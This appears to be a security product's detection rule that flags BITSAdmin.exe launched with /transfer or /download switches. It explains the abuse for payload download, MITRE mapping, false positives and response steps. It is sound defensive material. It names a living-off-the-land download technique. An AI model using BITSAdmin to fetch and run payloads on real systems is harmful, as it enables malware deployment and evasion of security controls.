BITSAdmin for File Download

Rule type:

Correlation

Rule description:

Background Intelligent Transfer Service (BITSAdmin) is a command-line tool that is used to create, download, upload, and monitor jobs of file transfer in Windows. The tool is used by administrators for the data transfers via HTTP and to manage files on SMB shares.

However, adversaries may also abuse this tool to download and execute malicious codes and payloads.

Attack chain scenario: Compromised RDP credentials -> Initial access -> Command and Control (C2) establishment -> BITSAdmin for file download -> Malware deployment

Impact:

This can affect the organizations in the following ways:

• Data exfiltration
• Bypassing security controls
• Persistence

Data source:

Windows > Process Creation

Required configuration: The rule is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.

Relevant MITRE ATT&CK techniques and tactics:

Tactic: TA0011- Command and Control

Technique: T1105- Ingress Tool Transfer

Procedure Example- S0190- BITSAdmin

Criteria:

(Process Name ends with BITSAdmin.exe) AND ((Command Line contains /transfer) OR (Command Line contains /download))

BITSAdmin.exe - It is used to create, monitor and manage BITS jobs such as download and upload files.

transfer - It is used to create a high priority download job immediately.

download - It is used to create a download job.

When to enable this rule:

Enabling this rule will help you meet the security standard's requirement listed below:

Security standards (NIST CSF 2.0):

PR.PS-06: Secure software development practices are integrated, and their performance is monitored throughout the software development life cycle.

When this rule is triggered, you're notified of a potential download activity using BITSAdmin.exe.This enables you to review the access and permissions, take corrective measures, such as regularly monitor the use of the tool for any unauthorized access.

Known false positives: Legitimate applications like Windows Update, Microsoft Office 365, and antivirus software use BITSAdmin.exe for the updates and file transfers. Alerts triggered by these activities may generate false positives; if required, refine the parent process name in the criteria.

Next steps:

When this alert is triggered, the following measures can be implemented:

• Identification: Identify if the alert is a new incident or part of an existing incident.
• Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
• Response: Respond promptly by initiating an automated workflow to cease the malicious process.
• Permissions: Restrict the use of BITSAdmin.exe to only authorized users and services.